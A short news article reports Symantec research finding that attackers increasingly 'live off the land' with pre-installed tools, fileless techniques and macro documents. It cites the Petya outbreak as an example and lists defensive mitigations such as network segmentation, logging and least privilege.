Hackers are Increasingly ‘Living off the Land,’ Symantec Research Finds

(Illustration: Shutterstock)

Cyber criminals are more and more often using tools and processes already installed in target computers, called “living off the land,” to ease hacking efforts and reduce the chance of detection, according to a recent Symantec study.

“Attackers are increasingly making use of tools already installed on targeted computers or are running simple scripts and shellcode directly in memory,” wrote Candid Wueest, threat researcher at Symantec. “Creating fewer new files on the hard disk, or being completely fileless, means less chance of being detected by traditional security tools and therefore minimizes the risk of an attack being blocked. Using simple and clean dual-use tools allows the attacker to hide in plain sight among legitimate system administration work.”

According to the report, there are four primary types of “living off the land” hacks:

  • Dual-use tools, such as PsExec, which are used by the attacker.
  • Memory only threats, such as the Code Red worm.
  • Fileless persistence, such as VBS in the registry.
  • Non-PE file attacks, such as Office documents with macros or scripts.

According to the report, the Petya hack in June is a good example of a “living off the land” attack.

“The ransomware exhibited some wiper characteristics and immediately gained the attention of both security experts and the media as it was, among other propagation methods, exploiting the SMB EternalBlue vulnerability just like the headline grabbing WannaCry (Ransom.WannaCry) did one month earlier,” Wueest wrote. “The threat made use of a clever supply chain attack as its initial infection vector by compromising the update process of a widely used accounting software program.”

The report said that the best mitigation practices for such attacks with low detectability include the introduction of best practices such as network segmentation, extensive logging, and a least-privileges approach. In addition, organizations should work to prevent infiltration through the most popular infection points: emails and compromised websites.

Recent